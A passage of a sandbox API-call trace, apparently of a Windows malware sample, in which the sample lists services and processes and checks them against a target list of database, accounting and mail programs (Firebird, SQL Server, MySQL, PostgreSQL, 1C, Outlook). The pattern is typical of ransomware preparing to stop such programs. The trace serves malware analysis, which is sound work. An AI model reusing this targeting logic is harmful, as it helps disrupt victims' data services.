	[0152.120] lstrlenW (lpString="NlaSvc") returned 6
	[0152.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0152.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0152.120] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0152.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0152.120] lstrlenW (lpString="nsi") returned 3
	[0152.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0152.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0152.121] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0152.121] lstrlenW (lpString="PcaSvc") returned 6
	[0152.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0152.121] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0152.121] lstrlenW (lpString="PlugPlay") returned 8
	[0152.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0152.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0152.121] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0152.121] lstrlenW (lpString="Power") returned 5
	[0152.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0152.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0152.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0152.121] lstrlenW (lpString="ProfSvc") returned 7
	[0152.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0152.121] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0152.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0152.121] lstrlenW (lpString="RpcEptMapper") returned 12
	[0152.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0152.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0152.122] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0152.122] lstrlenW (lpString="RpcSs") returned 5
	[0152.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0152.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0152.122] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0152.122] lstrlenW (lpString="SamSs") returned 5
	[0152.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0152.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0152.122] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0152.122] lstrlenW (lpString="Schedule") returned 8
	[0152.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0152.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0152.122] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0152.122] lstrlenW (lpString="SENS") returned 4
	[0152.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0152.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0152.122] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0152.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0152.122] lstrlenW (lpString="ShellHWDetection") returned 16
	[0152.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0152.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0152.123] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0152.123] lstrlenW (lpString="Spooler") returned 7
	[0152.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0152.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0152.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0152.123] lstrlenW (lpString="SysMain") returned 7
	[0152.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0152.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0152.123] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0152.123] lstrlenW (lpString="Themes") returned 6
	[0152.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0152.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0152.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0152.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0152.123] lstrlenW (lpString="TrkWks") returned 6
	[0152.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0152.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0152.124] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0152.124] lstrlenW (lpString="UxSms") returned 5
	[0152.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0152.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0152.124] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0152.124] lstrlenW (lpString="Winmgmt") returned 7
	[0152.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0152.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0152.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0152.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0152.124] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0152.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x298
	[0152.126] Process32FirstW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0152.126] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0152.126] lstrlenW (lpString="System") returned 6
	[0152.126] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0152.126] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0152.126] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0152.126] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0152.126] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0152.126] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0152.127] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0152.127] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0152.127] lstrlenW (lpString="smss.exe") returned 8
	[0152.127] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0152.127] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0152.127] lstrlenW (lpString="csrss.exe") returned 9
	[0152.127] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0152.127] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0152.127] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0152.128] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0152.128] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0152.128] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0152.128] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0152.128] lstrlenW (lpString="wininit.exe") returned 11
	[0152.128] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0152.128] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0152.128] lstrlenW (lpString="csrss.exe") returned 9
	[0152.128] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0152.128] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0152.129] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0152.129] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0152.129] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0152.129] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0152.129] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0152.129] lstrlenW (lpString="winlogon.exe") returned 12
	[0152.129] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0152.129] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0152.129] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0152.129] lstrlenW (lpString="services.exe") returned 12
	[0152.130] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0152.130] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0152.130] lstrlenW (lpString="lsass.exe") returned 9
	[0152.130] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0152.130] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0152.130] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0152.130] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0152.130] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0152.130] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0152.130] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0152.131] lstrlenW (lpString="lsm.exe") returned 7
	[0152.131] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0152.131] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0152.131] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0152.131] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0152.131] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0152.131] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.131] lstrlenW (lpString="svchost.exe") returned 11
	[0152.131] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0152.131] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0152.131] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.132] lstrlenW (lpString="svchost.exe") returned 11
	[0152.132] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0152.132] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.132] lstrlenW (lpString="svchost.exe") returned 11
	[0152.132] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0152.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0152.132] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.133] lstrlenW (lpString="svchost.exe") returned 11
	[0152.133] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.133] lstrlenW (lpString="svchost.exe") returned 11
	[0152.133] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0152.133] lstrlenW (lpString="audiodg.exe") returned 11
	[0152.133] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.134] lstrlenW (lpString="svchost.exe") returned 11
	[0152.134] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.134] lstrlenW (lpString="svchost.exe") returned 11
	[0152.134] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0152.134] lstrlenW (lpString="spoolsv.exe") returned 11
	[0152.134] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0152.135] lstrlenW (lpString="svchost.exe") returned 11
	[0152.135] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0152.135] lstrlenW (lpString="taskhost.exe") returned 12
	[0152.135] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0152.135] lstrlenW (lpString="userinit.exe") returned 12
	[0152.135] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0152.136] lstrlenW (lpString="dwm.exe") returned 7
	[0152.136] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0152.136] lstrlenW (lpString="explorer.exe") returned 12
	[0152.136] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0152.136] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0152.136] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0152.137] lstrlenW (lpString="reader_sl.exe") returned 13
	[0152.137] Process32NextW (in: hSnapshot=0x298, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0152.137] CloseHandle (hObject=0x298) returned 1
	[0152.137] Sleep (dwMilliseconds=0x1f4) 
	[0153.118] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617160
	[0153.242] EnumServicesStatusExW (in: hSCManager=0xb617160, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0153.242] GetLastError () returned 0xea
	[0153.242] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe3c) returned 0xb612378
	[0153.242] EnumServicesStatusExW (in: hSCManager=0xb617160, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xe3c, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0153.243] CloseServiceHandle (hSCObject=0xb617160) returned 1
	[0153.243] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0153.243] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0153.243] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
